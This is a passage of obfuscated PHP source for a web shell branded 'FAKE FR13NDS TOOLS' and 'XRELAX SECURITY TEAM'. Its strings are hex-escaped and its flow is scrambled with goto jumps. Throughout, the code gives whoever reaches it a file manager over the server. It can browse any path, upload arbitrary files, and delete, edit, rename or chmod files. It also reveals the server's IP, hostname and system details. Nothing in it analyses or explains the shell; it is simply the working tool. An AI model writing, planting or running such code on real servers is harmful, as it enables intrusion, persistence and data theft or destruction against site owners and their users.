\42\76\x20{$dir}\74\x2f\141\76\74\57\x74\144\x3e\12\x3c\x74\144\40\x63\154\x61\163\x73\75\164\144\137\x68\157\x6d\145\76\74\x63\x65\x6e\x74\145\162\x3e\x44\x49\x52\74\x2f\143\145\156\164\x65\162\x3e\74\57\164\x64\76\xa\74\x74\144\40\x63\x6c\x61\x73\163\x3d\x74\x64\x5f\x68\x6f\x6d\x65\76\x3c\143\145\156\x74\x65\x72\76"; if (is_writable("{$path}\57{$dir}")) { echo "\74\146\x6f\x6e\164\x20\x63\157\154\157\x72\75\42\43\60\60\x46\106\x46\x46\x22\x3e"; } elseif (!is_readable("{$path}\x2f{$dir}")) { echo "\x3c\146\x6f\156\x74\x20\x63\x6f\154\157\x72\x3d\42\43\106\106\x30\60\60\64\42\76"; } echo perms("{$path}\57{$dir}"); if (is_writable("{$path}\x2f{$dir}") || !is_readable("{$path}\x2f{$dir}")) { echo "\74\x2f\146\157\156\164\76"; } echo "\x3c\x2f\143\145\156\x74\145\x72\x3e\x3c\x2f\x74\144\x3e\xa\x3c\164\144\40\143\154\x61\163\163\75\164\x64\x5f\x68\x6f\155\145\76\74\x63\x65\x6e\x74\x65\x72\x3e\74\146\x6f\x72\155\40\x6d\145\x74\150\x6f\144\x3d\x22\120\117\123\124\42\x20\x61\143\164\151\x6f\156\75\x22\x3f\x6f\160\x74\x69\x6f\x6e\46\160\x61\x74\x68\x3d{$path}\42\x3e\xa\x3c\x73\145\x6c\x65\143\164\40\x6e\x61\155\x65\x3d\x22\x6f\160\164\x22\x20\163\x74\171\x6c\x65\75\x22\155\x61\162\x67\x69\x6e\x2d\x74\157\x70\x3a\x36\x70\170\73\167\x69\x64\x74\x68\72\x31\x30\x30\160\x78\x3b\146\157\156\164\x2d\146\x61\155\x69\x6c\171\x3a\x4b\145\154\154\x79\40\x53\x6c\x61\x62\73\146\157\x6e\x74\55\x73\151\x7a\x65\x3a\61\65\x3b\142\x61\143\153\x67\x72\x6f\x75\x6e\144\72\142\154\141\x63\153\x3b\x63\157\x6c\157\x72\72\x6c\x69\x6d\145\x3b\x62\157\x72\144\145\162\72\62\x70\170\x20\x73\157\x6c\x69\144\x20\154\x69\155\x65\73\142\x6f\162\144\145\x72\55\x72\141\144\151\x75\x73\72\65\x70\x78\x22\x3e\xa\74\x6f\160\x74\151\157\156\x20\x76\x61\154\x75\145\75\42\101\143\x74\x69\x6f\x6e\42\x3e\x41\143\x74\x69\x6f\156\x3c\57\x6f\160\164\151\x6f\156\76\xa\x3c\x6f\x70\164\x69\x6f\156\40\166\x61\154\165\x65\75\42\144\145\154\x65\164\x65\42\76\104\145\154\145\164\x65\x3c\x2f\157\x70\x74\151\157\156\76\xa\x3c\157\x70\x74\x69\x6f\156\40\x76\x61\x6c\x75\x65\75\x22\x63\x68\155\157\x64\x22\x3e\103\x68\155\x6f\x64\x3c\57\157\x70\164\151\x6f\156\76\12\74\x6f\160\164\x69\x6f\156\40\166\141\154\x75\x65\75\42\x72\145\x6e\141\x6d\145\x22\x3e\122\145\156\x61\155\x65\74\57\x6f\x70\164\151\x6f\156\76\12\x3c\x2f\x73\145\154\x65\x63\x74\76\12\74\151\156\x70\x75\x74\40\164\171\160\x65\75\42\x68\151\x64\144\145\156\42\x20\x6e\x61\155\x65\75\x22\x74\171\x70\x65\42\40\166\x61\154\x75\145\75\42\144\x69\162\x22\x3e\xa\x3c\151\x6e\x70\x75\164\40\164\x79\x70\x65\75\42\150\151\144\144\145\156\42\x20\156\141\155\x65\x3d\x22\156\141\x6d\145\x22\40\x76\x61\154\165\x65\x3d\x22{$dir}\x22\x3e\xa\x3c\151\156\160\165\x74\40\x74\x79\160\145\75\42\150\151\x64\144\145\156\x22\40\x6e\141\x6d\145\x3d\42\160\x61\x74\x68\x22\x20\166\x61\154\165\145\x3d\42{$path}\57{$dir}\42\x3e\xa\74\x69\156\x70\165\164\40\x74\x79\x70\x65\75\x22\x73\x75\x62\x6d\x69\x74\x22\x20\x76\x61\154\165\145\75\42\76\x22\40\163\164\171\154\145\x3d\x22\x6d\x61\x72\147\151\156\55\164\157\x70\x3a\66\160\170\73\x77\x69\x64\164\150\72\62\x37\x3b\x66\157\x6e\164\x2d\x66\x61\x6d\x69\x6c\x79\x3a\x4b\x65\x6c\154\x79\40\123\x6c\141\142\x3b\146\x6f\x6e\x74\x2d\163\x69\x7a\x65\x3a\61\65\x3b\142\x61\x63\x6b\x67\162\x6f\x75\x6e\144\x3a\x62\154\x61\143\153\73\x63\157\x6c\157\x72\72\154\x69\155\x65\x3b\x62\157\x72\144\145\162\x3a\x32\160\170\x20\x73\157\x6c\151\144\40\154\x69\x6d\145\x3b\142\x6f\x72\144\x65\162\55\x72\141\144\x69\165\x73\72\65\x70\170\x22\x2f\76\xa\x3c\57\x66\157\162\x6d\x3e\x3c\x2f\x63\x65\156\164\145\162\76\74\57\164\x64\76\xa\x3c\57\164\162\x3e"; } echo "\74\164\162\40\143\x6c\x61\163\163\75\42\146\x69\x72\x73\164\x22\76\74\x74\x64\76\74\57\164\x64\76\x3c\x74\x64\76\74\x2f\164\x64\76\74\164\x64\x3e\x3c\57\x74\x64\76\74\164\x64\76\74\57\164\144\76\x3c\x2f\x74\x72\x3e"; foreach ($scandir as $file) { if (!is_file("{$path}\x2f{$file}")) { continue; } $size = filesize("{$path}\x2f{$file}") / 1024; $size = round($size, 3); if ($size >= 1024) { $size = round($size / 1024, 2) . "\x20\115\102"; } else { $size = $size . "\x20\113\x42"; } echo "\74\x74\162\x3e\xa\74\164\144\x20\x63\x6c\x61\x73\x73\x3d\x74\x64\x5f\x68\157\155\x65\76\x3c\x69\x6d\147\x20\x73\162\143\75\x27\144\141\164\x61\72\x69\x6d\141\x67\145\x2f\x70\x6e\x67\x3b\142\x61\163\145\66\64\54\x69\x56\x42\117\x52\x77\60\x4b\107\x67\x6f\101\101\101\x41\x4e\x53\125\x68\x45\125\147\x41\101\x41\x42\101\x41\x41\101\101\121\x43\101\x59\x41\101\101\x41\x66\70\x2f\x39\x68\101\101\x41\x41\x41\130\116\x53\x52\60\x49\101\162\163\x34\x63\x36\x51\x41\x41\x41\x41\132\151\x53\x30\x64\x45\x41\x50\70\x41\57\167\104\x2f\157\x4c\x32\x6e\x6b\x77\x41\101\101\101\x6c\167\123\106\154\x7a\x41\x41\101\114\105\x77\101\101\103\170\115\x42\101\112\161\143\x47\101\x41\x41\x41\x41\144\60\123\125\x31\x46\102\x39\x6f\x4a\102\x68\143\x54\112\x76\62\x42\x32\144\x34\x41\x41\x41\x4a\115\123\x55\122\102\x56\104\152\x4c\x62\x5a\117\71\124\150\170\x5a\105\x49\127\57\x71\154\x76\x64\164\115\x33\70\102\116\147\112\x51\x6d\121\147\x4a\x47\x64\53\x41\57\x4d\121\x42\x4c\x77\107\x6a\x69\x77\110\63\x6e\167\x64\x6b\123\114\164\117\x32\170\105\x52\107\x35\x4c\x71\x78\x58\122\x53\x49\x52\x32\131\x44\146\x44\x34\x47\153\x47\x4d\60\x50\63\x72\142\64\142\x39\x50\x41\x7a\60\154\x37\x70\x53\154\127\154\x57\60\146\x6e\x6e\114\x6f\x6c\101\x49\x50\102\x34\120\x58\150\64\145\x46\165\x6e\x75\x63\x41\111\x49\x4c\x77\144\x45\123\x65\x5a\x79\x41\x69\146\x6e\160\x36\53\165\71\x6f\x4e\x4c\157\x33\147\x4d\63\x4e\x7a\124\144\110\122\53\x2f\57\x7a\x76\x4a\x4d\172\123\x79\112\x4b\x4b\157\x64\x69\111\x67\70\101\130\141\x78\x65\x49\172\61\x62\x44\132\x37\x4d\x78\x71\x4e\x66\164\147\123\x55\122\x44\127\171\x37\x4c\x55\x6e\132\x30\144\x59\x6d\170\101\x46\x41\126\x45\x6c\111\66\x41\105\103\171\147\x49\x73\121\x51\163\151\172\114\x42\x4f\x41\102\x41\104\117\x6a\x4b\x41\x70\x71\x68\x37\x75\67\x47\157\x43\125\127\x69\x77\131\x62\145\x74\157\x55\110\162\x72\120\x63\x77\103\x71\157\x46\62\x4b\125\145\130\x4c\x7a\105\172\102\166\x30\x2b\165\121\155\x53\110\115\x45\132\x39\x46\x36\123\x5a\x63\x72\66\x69\64\x49\x73\x42\117\141\57\142\x37\110\x51\x4d\141\110\164\111\101\x77\147\x4c\144\110\x61\x6c\104\x41\x31\145\166\60\145\x51\x62\123\152\162\105\162\121\167\112\x70\x71\x46\x34\145\101\x78\57\x68\157\161\x44\x31\63\62\155\x4d\153\x4a\162\151\x35\165\x53\117\154\x46\x68\x45\150\160\125\x51\x49\x69\157\x6a\x77\141\x6d\117\104\x4e\x73\x6c\x6a\146\x55\x57\x43\x71\160\x4c\156\x4f\141\141\103\x53\x4b\x4a\x74\156\141\x42\x43\163\132\x59\152\101\x6c\x6c\155\x58\x49\x34\x76\141\145\x6f\141\x56\x58\60\143\142\123\x64\x68\x6d\x55\122\63\x7a\x41\113\166\x4e\x6a\131\x36\x56\x69\x6f\x6f\x30\164\127\172\x67\x45\x6f\156\113\x62\127\53\113\153\x47\x57\164\x33\x55\x6e\164\60\x43\145\107\x66\112\x73\x39\147\53\x55\125\60\162\x45\107\110\110\x2f\110\167\x2f\115\152\x48\66\57\x54\53\120\x4f\144\106\157\122\116\113\x43\150\115\62\x32\x78\155\117\120\x65\x73\160\152\120\107\121\x36\110\x70\x4e\x51\62\67\x74\x36\163\101\x43\104\x53\x4e\x61\156\171\157\x6c\152\104\114\105\144\x56\x61\x46\117\114\x65\70\x5a\153\x55\152\113\65\x75\153\x71\63\x74\x37\x39\x6c\x50\103\67\57\117\104\x6b\x35\107\x61\53\x59\66\117\65\x4d\161\171\155\x4e\167\x33\126\61\171\63\x68\171\x7a\x66\x58\x30\150\161\x76\112\x4c\171\142\130\x46\x64\53\x2b\x66\x32\x64\63\x64\60\144\x6d\x73\53\x71\166\x67\x34\x4f\104\x7a\70\x66\110\170\60\x2f\114\163\x62\x65\x33\71\x36\64\x73\x53\x37\x2b\64\165\105\x6a\x75\x6e\160\161\155\123\x65\x36\145\63\104\x33\116\65\57\x4e\x30\127\132\x62\164\154\171\x39\x66\x30\x39\156\x5a\62\132\57\x62\x32\x39\x76\x32\146\114\105\x65\x76\166\x4b\x39\161\x76\67\143\62\x74\157\113\151\70\x55\x69\x69\121\x69\161\x48\x62\x6d\x36\162\151\127\x36\141\61\63\x66\156\x2b\172\x76\x37\63\x2b\x6f\x71\x6f\x72\150\x63\x4c\x67\x4b\125\x46\x58\x56\120\x2b\146\x6e\65\x32\x2b\x4c\157\156\152\x38\111\x4c\112\x30\x50\x38\132\111\103\103\106\71\57\120\x54\x70\x43\154\150\x70\x42\166\147\120\145\x6c\157\x4c\71\x55\x35\65\116\111\101\x41\101\x41\101\x41\123\x55\x56\117\122\113\x35\103\x59\111\111\75\47\76\x3c\x61\x20\x68\x72\x65\x66\75\42\77\146\151\154\x65\163\x72\x63\x3d{$path}\57{$file}\x26\x70\x61\164\150\x3d{$path}\x22\76\40{$file}\74\x2f\x61\x3e\x3c\57\164\x64\x3e\xa\74\x74\x64\40\143\154\141\x73\x73\x3d\x74\x64\137\150\x6f\155\x65\76\74\143\145\x6e\164\x65\162\x3e" . $size . "\74\x2f\143\145\x6e\164\x65\x72\76\x3c\57\x74\144\x3e\12\x3c\x74\x64\x20\x63\x6c\x61\x73\163\x3d\x74\144\x5f\150\157\x6d\145\x3e\74\143\x65\156\164\145\x72\76"; if (is_writable("{$path}\57{$file}")) { echo "\x3c\x66\x6f\156\164\x20\143\x6f\154\157\x72\x3d\x22\x23\70\60\x30\60\106\x46\42\76"; } elseif (!is_readable("{$path}\57{$file}")) { echo "\74\x66\x6f\156\164\40\143\x6f\x6c\157\162\75\42\x23\106\106\x30\60\x30\x34\42\76"; } echo perms("{$path}\x2f{$file}"); if (is_writable("{$path}\x2f{$file}") || !is_readable("{$path}\57{$file}")) { echo "\x3c\57\x66\x6f\156\x74\76"; } echo "\74\x2f\143\145\156\x74\145\162\x3e\x3c\57\164\144\x3e\12\x3c\x74\x64\40\143\154\141\x73\x73\75\x74\144\x5f\150\x6f\155\145\x3e\74\x63\x65\x6e\x74\x65\x72\76\74\146\x6f\x72\x6d\x20\x6d\145\x74\150\x6f\x64\x3d\42\x50\117\x53\124\42\x20\x61\143\x74\151\157\156\x3d\x22\x3f\x6f\x70\x74\x69\x6f\156\x26\160\141\164\x68\x3d{$path}\x22\76\xa\74\163\145\x6c\145\143\164\40\x6e\141\155\145\x3d\x22\x6f\x70\164\42\40\x73\x74\x79\154\x65\x3d\x22\155\141\162\147\x69\x6e\55\164\157\160\x3a\x36\160\x78\x3b\167\x69\144\164\150\72\x31\60\60\160\x78\x3b\146\x6f\x6e\164\x2d\146\x61\155\151\x6c\171\x3a\113\145\x6c\x6c\171\40\x53\154\x61\142\73\x66\x6f\156\x74\x2d\163\151\x7a\145\x3a\61\65\73\142\x61\x63\153\147\162\x6f\165\x6e\144\72\167\150\151\x74\145\73\143\x6f\x6c\x6f\162\72\154\x69\155\x65\73\x62\157\x72\144\145\162\x3a\x32\x70\x78\40\163\x6f\x6c\x69\144\40\154\x69\155\145\x3b\142\157\x72\144\145\162\55\x72\141\x64\x69\x75\x73\x3a\65\x70\x78\42\x3e\xa\x3c\x6f\x70\164\x69\x6f\156\x20\x76\x61\x6c\x75\x65\75\42\101\143\164\x69\157\156\42\x3e\101\x63\x74\x69\x6f\156\74\x2f\x6f\x70\164\151\x6f\x6e\x3e\xa\74\157\x70\164\151\157\156\x20\166\x61\154\x75\x65\75\x22\144\x65\154\x65\164\x65\x22\x3e\104\x65\x6c\x65\x74\x65\x3c\57\157\x70\x74\151\157\x6e\x3e\xa\x3c\x6f\160\x74\x69\x6f\x6e\x20\x76\141\x6c\x75\x65\75\42\x65\x64\151\x74\x22\76\x45\x64\151\x74\x3c\57\x6f\160\x74\x69\x6f\x6e\76\12\74\157\x70\164\151\x6f\156\x20\166\x61\154\x75\145\75\42\162\145\x6e\x61\x6d\145\x22\x3e\122\x65\156\x61\155\x65\74\57\x6f\160\x74\x69\x6f\x6e\x3e\12\74\157\160\164\x69\x6f\x6e\x20\166\x61\x6c\165\x65\75\42\x63\150\x6d\x6f\x64\42\x3e\103\150\x6d\157\144\x3c\x2f\x6f\160\164\x69\x6f\156\x3e\12\x3c\x2f\x73\x65\154\x65\143\x74\x3e\xa\x3c\151\x6e\160\x75\164\40\x74\x79\x70\145\75\x22\x68\x69\144\x64\x65\x6e\42\40\x6e\141\x6d\145\x3d\42\164\171\160\145\x22\x20\166\141\154\x75\145\x3d\x22\146\151\154\145\x22\x3e\xa\74\x69\156\x70\x75\x74\40\164\171\x70\145\x3d\42\x68\151\144\144\x65\x6e\42\x20\156\141\x6d\x65\x3d\x22\x6e\x61\155\145\42\x20\166\141\x6c\x75\145\75\x22{$file}\42\76\xa\x3c\x69\156\160\165\164\x20\x74\171\x70\145\75\x22\x68\151\x64\144\x65\156\x22\x20\156\x61\155\145\75\42\x70\x61\164\x68\42\x20\x76\141\x6c\x75\145\x3d\42{$path}\57{$file}\x22\x3e\xa\x3c\x69\156\160\x75\164\x20\x74\171\160\x65\x3d\42\x73\165\x62\x6d\151\x74\42\x20\166\141\x6c\165\145\75\42\76\x22\x20\x73\164\x79\x6c\x65\x3d\x22\x6d\141\162\147\x69\156\55\164\x6f\160\x3a\x36\x70\170\x3b\x77\x69\144\164\150\x3a\x32\x37\73\x66\157\x6e\x74\x2d\x66\141\155\151\x6c\171\72\113\145\154\154\x79\40\123\154\x61\142\x3b\x66\157\156\x74\55\x73\x69\172\145\x3a\x31\x35\x3b\142\141\143\x6b\147\x72\157\165\156\144\72\x62\154\141\143\153\x3b\143\x6f\154\157\x72\72\x6c\x69\x6d\x65\73\142\157\162\144\145\162\x3a\x32\x70\170\40\x73\157\154\151\x64\x20\x6c\x69\155\145\73\142\x6f\162\x64\145\x72\55\162\141\144\151\165\163\x3a\x35\160\x78\42\57\x3e\12\74\57\x66\157\162\x6d\x3e\74\57\x63\x65\156\164\145\162\x3e\74\x2f\164\144\76\xa\x3c\x2f\164\x72\x3e"; } echo "\74\57\x74\x61\142\x6c\x65\x3e\12\74\57\144\151\x76\76"; } goto rrxSv; Q6Hbw: echo "\x3c\x74\x72\x3e\x3c\x74\x64\x3e\x3c\x66\x6f\156\164\40\143\157\x6c\x6f\162\75\x27\167\150\151\164\145\x27\x3e\12\74\x69\x20\x63\154\141\x73\x73\x3d\47\x66\x61\x20\146\x61\55\x75\163\x65\162\47\76\74\x2f\151\x3e\x20\x3c\164\144\76\x3a\40\x3c\x66\157\x6e\x74\40\143\x6f\x6c\157\x72\x3d\x27\x6c\151\155\x65\x27\x3e" . $_SERVER["\x52\x45\115\117\124\105\137\101\104\104\122"] . "\x3c\x74\x72\76\74\x74\144\x3e\74\146\x6f\x6e\x74\x20\143\157\x6c\x6f\162\x3d\47\167\150\151\164\145\x27\76\xa\x3c\x69\x20\x63\x6c\141\163\163\75\x27\146\141\x20\x66\141\55\144\x65\163\153\x74\x6f\160\47\76\74\57\151\x3e\40\74\164\144\x3e\72\40\x3c\146\157\x6e\164\40\143\157\x6c\x6f\162\x3d\47\154\x69\155\145\47\x3e" . gethostbyname($_SERVER["\110\x54\124\120\x5f\x48\x4f\123\x54"]) . "\x20\57\40" . $_SERVER["\x53\x45\122\x56\x45\x52\137\x4e\101\x4d\x45"] . "\74\164\x72\x3e\x3c\164\x64\x3e\74\146\x6f\156\164\x20\x63\157\154\x6f\x72\75\47\x77\150\x69\x74\145\47\x3e\12\74\x69\40\143\154\141\x73\x73\75\x27\x66\x61\40\x66\141\x2d\150\x64\x64\55\157\47\x3e\74\x2f\151\x3e\x20\x3c\x74\x64\x3e\72\x20\x3c\x66\157\156\164\40\x63\x6f\x6c\x6f\162\75\47\x6c\151\x6d\x65\47\x3e" . php_uname() . "\74\57\x66\x6f\156\164\76\x3c\57\164\162\x3e\x3c\57\x74\144\x3e\74\57\164\141\142\x6c\145\76"; goto xGv9F; TxsVf: $path = str_replace("\134", "\x2f", $path); goto lV0iY; XnB_2: echo "\x3c\57\x66\x6f\x72\155\x3e\x3c\57\164\x64\x3e\74\57\164\x72\x3e"; goto ko8ji; S8vVB: echo "\x3c\x62\x72\76\x3c\142\162\x3e\74\x62\x72\x3e\74\146\157\156\164\40\x63\x6f\154\x6f\162\x3d\42\x6c\151\x6d\x65\42\x3e\74\146\x6f\x72\155\x20\145\156\x63\164\171\x70\x65\x3d\42\155\165\x6c\x74\151\x70\x61\x72\x74\x2f\146\157\162\155\x2d\x64\x61\164\x61\42\x20\155\145\164\x68\157\x64\75\42\120\x4f\x53\x54\x22\x3e\xa\125\x70\154\x6f\x61\144\x20\106\151\x6c\x65\x3a\40\x3c\151\156\x70\x75\x74\40\164\x79\x70\x65\75\x22\146\151\x6c\x65\42\40\156\x61\x6d\145\75\42\146\151\154\x65\x22\40\163\164\171\x6c\x65\x3d\x22\x63\157\x6c\157\162\72\x6c\x69\155\145\73\x62\157\162\144\145\162\72\62\x70\170\40\x73\x6f\x6c\x69\144\40\x6c\x69\155\145\73\x22\x20\x72\145\161\x75\151\162\145\x64\x2f\x3e\74\57\146\x6f\156\x74\76\xa\x3c\151\x6e\160\165\x74\40\164\171\160\x65\75\x22\163\x75\x62\x6d\151\164\42\40\x76\141\154\165\x65\x3d\x22\125\120\x4c\x4f\x41\x44\x22\x20\x73\x74\x79\x6c\145\x3d\x22\x6d\x61\x72\147\151\156\55\164\x6f\160\x3a\64\x70\170\x3b\167\x69\144\164\x68\x3a\61\x30\60\160\x78\x3b\x68\x65\151\147\x68\164\x3a\x32\67\160\170\73\146\x6f\x6e\x74\55\146\141\x6d\x69\x6c\171\72\x4b\x65\x6c\x6c\171\x20\x53\x6c\141\142\73\x66\157\156\164\x2d\x73\151\172\145\72\61\x35\73\142\x61\143\153\x67\x72\157\x75\156\144\72\142\154\x61\x63\x6b\x3b\x63\157\x6c\157\162\72\40\x6c\x69\155\x65\x3b\142\x6f\162\144\x65\162\x3a\x32\160\170\40\163\x6f\x6c\x69\144\40\154\151\x6d\x65\x3b\x62\x6f\x72\144\x65\x72\55\162\141\x64\x69\x75\x73\x3a\65\160\x78\x22\57\x3e"; goto Imrqr; y1SNe: error_reporting(0); goto RtwVt; blaJS: foreach ($paths as $id => $pat) { if ($pat == '' && $id == 0) { $a = true; echo "\74\151\x20\143\154\x61\163\163\75\42\146\x61\40\146\x61\x2d\x66\157\x6c\144\x65\162\x2d\x6f\x22\76\x3c\57\x69\76\40\72\40\74\x61\40\x68\x72\145\x66\75\42\77\x70\141\x74\x68\x3d\57\42\76\57\74\x2f\x61\76"; continue; } if ($pat == '') { continue; } echo "\74\x61\x20\150\x72\x65\x66\75\42\77\160\x61\164\150\x3d"; for ($i = 0; $i <= $id; $i++) { echo "{$paths[$i]}"; if ($i != $id) { echo "\x2f"; } } echo "\x22\76" . $pat . "\74\x2f\141\76\57"; } goto S8vVB; rrxSv: function perms($file) { $perms = fileperms($file); if (($perms & 49152) == 49152) { $info = "\163"; } elseif (($perms & 40960) == 40960) { $info = "\x6c"; } elseif (($perms & 32768) == 32768) { $info = "\x2d"; } elseif (($perms & 24576) == 24576) { $info = "\x62"; } elseif (($perms & 16384) == 16384) { $info = "\144"; } elseif (($perms & 8192) == 8192) { $info = "\143"; } elseif (($perms & 4096) == 4096) { $info = "\x70"; } else { $info = "\x75"; } $info .= $perms & 256 ? "\x72" : "\55"; $info .= $perms & 128 ? "\x77" : "\x2d"; $info .= $perms & 64 ? $perms & 2048 ? "\x73" : "\x78" : ($perms & 2048 ? "\x53" : "\55"); $info .= $perms & 32 ? "\x72" : "\55"; $info .= $perms & 16 ? "\x77" : "\x2d"; $info .= $perms & 8 ? $perms & 1024 ? "\163" : "\x78" : ($perms & 1024 ? "\x53" : "\55"); $info .= $perms & 4 ? "\x72" : "\55"; $info .= $perms & 2 ? "\x77" : "\x2d"; $info .= $perms & 1 ? $perms & 512 ? "\164" : "\170" : ($perms & 512 ? "\x54" : "\x2d"); return $info; } goto qeUe4; lV0iY: $paths = explode("\57", $path); goto blaJS; xGv9F: echo "\x3c\164\x61\x62\x6c\x65\40\x77\x69\x64\164\150\75\x22\x39\65\x25\42\40\x62\x6f\162\144\x65\x72\75\x22\60\42\40\143\x65\154\x6c\160\141\x64\144\x69\x6e\147\x3d\42\60\42\40\x63\x65\x6c\154\163\x70\x61\x63\x69\x6e\147\75\x22\60\x22\40\x61\154\151\x67\156\75\x22\143\x65\x6e\x74\x65\162\x22\x3e\xa\x3c\x74\x72\x20\141\x6c\151\147\x6e\x3d\42\143\145\156\x74\x65\162\42\76\x3c\x74\144\x20\141\x6c\151\x67\156\75\x22\143\x65\156\164\x65\x72\x22\x3e\74\142\x72\x3e"; goto u6WEm; u6WEm: if (isset($_GET["\x70\x61\x74\150"])) { $path = $_GET["\x70\x61\164\x68"]; } else { $path = getcwd(); } goto TxsVf; Imrqr: if (isset($_FILES["\x66\151\154\x65"])) { if (copy($_FILES["\x66\x69\154\145"]["\x74\x6d\160\x5f\156\x61\x6d\x65"], $path . "\57" . $_FILES["\x66\151\154\x65"]["\156\141\155\145"])) { echo "\x3c\x62\162\x3e\74\x62\162\x3e\74\146\x6f\x6e\164\x20\x63\x6f\x6c\157\162\75\42\154\x69\x6d\145\x22\x3e\125\x50\x4c\x4f\x41\x44\40\x53\125\x43\x43\105\123\x20\41\x21\41\41\x3c\x2f\x66\x6f\x6e\x74\x3e\x3c\142\162\x2f\x3e"; } else { echo "\74\163\x63\162\x69\160\x74\76\141\x6c\145\x72\164\x28\42\x46\x69\x6c\145\40\x47\x61\147\141\x6c\x20\x44\x69\x75\x70\154\157\141\x64\x20\41\x21\42\x29\x3c\x2f\x73\x63\162\151\x70\164\x3e"; } } goto XnB_2; RtwVt: session_start(); goto R7StG; R7StG: if (get_magic_quotes_gpc()) { foreach ($_POST as $key => $value) { $_POST[$key] = stripslashes($value); } } goto xQ_gH; xQ_gH: echo "\74\x21\x44\117\x43\124\x59\x50\x45\x20\110\124\x4d\x4c\x3e\xa\40\74\x68\61\x3e\106\x41\x4b\105\40\x46\122\x31\x33\x4e\x44\123\x20\124\x4f\x4f\x4c\x53\74\x2f\150\x31\x3e\12\74\142\162\x3e\74\x66\157\156\164\40\143\157\154\157\162\x3d\x22\154\151\155\x65\42\x3e\x50\122\x49\126\x38\74\x2f\x66\157\156\x74\x3e\74\x62\x72\57\x3e\xa\74\142\x72\x3e\x3c\x66\x6f\156\x74\x20\143\x6f\x6c\x6f\x72\75\x22\154\151\x6d\145\42\76\130\122\x45\x4c\101\130\x20\123\x45\103\x55\122\111\124\x59\x20\124\x45\101\x4d\x20\41\x21\74\57\146\x6f\x6e\164\76\x3c\142\x72\57\x3e\xa\x3c\x6c\x69\x6e\x6b\40\150\x72\x65\x66\x3d\x22\150\x74\164\160\x73\72\57\57\x66\157\x6e\164\163\56\x67\157\157\x67\154\145\x61\x70\x69\x73\56\143\157\155\57\x63\163\x73\x3f\x66\141\x6d\151\154\x79\75\x4b\x65\x6c\x6c\171\53\123\154\141\142\42\40\x72\x65\154\75\42\163\164\x79\154\145\163\x68\145\x65\164\x22\40\x74\x79\160\145\75\x22\164\x65\x78\x74\x2f\143\163\x73\42\76\xa\74\x6c\151\156\x6b\40\x68\x72\x65\146\x3d\42\x68\x74\x74\x70\x73\x3a\57\x2f\x73\x74\141\143\x6b\160\x61\164\x68\x2e\142\x6f\x6f\164\x73\x74\162\x61\x70\x63\x64\x6e\56\143\x6f\x6d\x2f\x66\157\x6e\x74\55\141\167\145\163\157\155\x65\x2f\x34\56\67\x2e\60\x2f\143\163\163\57\146\157\x6e\164\x2d\141\167\x65\163\157\x6d\x65\x2e\155\x69\x6e\56\x63\x73\x73\x22\40\x72\x65\x6c\75\x22\163\x74\x79\x6c\145\163\150\x65\x65\x74\x22\40\164\171\x70\x65\x3d\42\x74\x65\x78\x74\x2f\143\x73\163\x22\57\x3e\xa\x3c\x63\145\x6e\164\145\162\x3e\xa\74\x73\x74\x79\x6c\x65\x20\164\x79\x70\x65\75\x22\x74\x65\170\164\x2f\x63\x73\x73\42\76\12\142\x6f\x64\x79\40\x7b\xa\11\146\157\156\x74\x2d\x66\x61\x6d\151\154\x79\72\40\x4b\x65\x6c\x6c\x79\40\x53\154\141\x62\x3b\12\11\x62\x61\x63\x6b\147\162\x6f\x75\156\x64\x2d\x63\157\x6c\x6f\162\x3a\x20\x23\60\60\x30\x30\x38\102\x3b\xa\x9\143\x6f\x6c\x6f\x72\x3a\40\x23\60\60\x46\x46\106\106\x3b\12\x9\175\12\x23\x63\157\156\164\x65\156\x74\40\164\x72\72\150\157\166\x65\x72\173\xa\x9\142\141\x63\x6b\147\162\157\165\156\x64\x2d\143\x6f\x6c\x6f\162\72\40\43\60\60\106\x46\x46\106\73\12\11\164\145\170\x74\x2d\163\150\141\x64\x6f\x77\x3a\x30\160\x78\40\x30\x70\x78\40\x31\x30\160\170\40\x23\60\x30\60\60\x30\60\x3b\xa\11\x7d\12\43\143\x6f\156\x74\145\156\x74\x20\56\146\151\x72\163\x74\173\xa\x9\143\x6f\154\157\x72\72\40\x23\x30\60\x30\60\x30\60\x3b\12\11\142\x61\x63\x6b\147\x72\157\165\156\144\x2d\x69\x6d\141\x67\145\x3a\x75\162\154\x28\x23\x29\73\xa\11\175\xa\43\x63\x6f\156\164\x65\x6e\x74\x20\56\146\151\x72\163\x74\72\150\157\x76\145\162\173\xa\x9\x62\141\143\153\x67\x72\157\165\156\x64\x2d\143\157\x6c\x6f\162\72\40\147\x72\145\x79\x3b\12\11\x74\145\x78\164\55\x73\x68\x61\144\x6f\167\x3a\x30\x70\170\40\x30\160\x78\x20\x31\160\170\x20\43\63\x33\x39\71\60\x30\73\12\x9\175\xa\164\x61\x62\x6c\x65\54\40\x74\x68\x2c\x20\x74\x64\40\x7b\12\x9\11\x62\x6f\162\x64\x65\x72\x2d\x63\x6f\154\154\x61\160\x73\145\x3a\x63\x6f\x6c\x6c\141\160\x73\x65\x3b\12\11\x9\x70\x61\144\144\151\156\x67\72\40\65\x70\170\x3b\xa\x9\11\x63\157\154\157\162\x3a\x20\x6c\x69\155\145\73\12\x9\11\x7d\12\x2e\164\x61\142\154\145\x5f\150\x6f\x6d\145\x2c\40\56\164\x68\x5f\x68\x6f\x6d\x65\x2c\40\56\164\x64\x5f\150\x6f\155\x65\x20\x7b\x20\xa\x9\x9\143\157\154\x6f\162\72\x20\154\x69\x6d\145\x3b\12\11\x9\142\157\x72\x64\x65\162\72\x20\62\x70\x78\40\163\x6f\154\x69\144\x20\147\x72\x65\x79\x3b\12\x9\x9\x70\141\x64\x64\151\x6e\147\72\40\x37\x70\170\x3b\12\11\x9\175\12\x61\x7b\xa\x9\x66\x6f\156\164\x2d\x73\151\172\x65\72\x20\x31\71\x70\x78\73\xa\11\143\x6f\x6c\157\162\72\x20\43\x30\60\x66\146\x30\60\x3b\12\11\164\x65\170\x74\55\x64\145\143\157\162\x61\x74\x69\x6f\156\72\x20\156\x6f\156\145\73\12\11\175\12\141\72\150\157\166\x65\162\173\12\x9\x63\157\x6c\157\162\72\x20\167\150\x69\x74\145\73\12\x9\x74\145\170\x74\55\x73\x68\x61\144\x6f\x77\72\60\x70\x78\40\x30\160\x78\40\x31\x30\160\170\x20\x23\63\x33\x39\71\60\60\73\12\11\x7d\12\151\156\160\165\164\54\x73\x65\154\x65\x63\x74\54\x74\x65\x78\x74\x61\x72\x65\x61\173\xa\x9\x62\x6f\162\x64\145\x72\72\x20\x31\x70\170\40\x23\x66\x66\146\146\x66\146\40\163\x6f\154\x69\x64\73\12\11\x2d\x6d\x6f\172\x2d\x62\157\162\144\145\162\x2d\x72\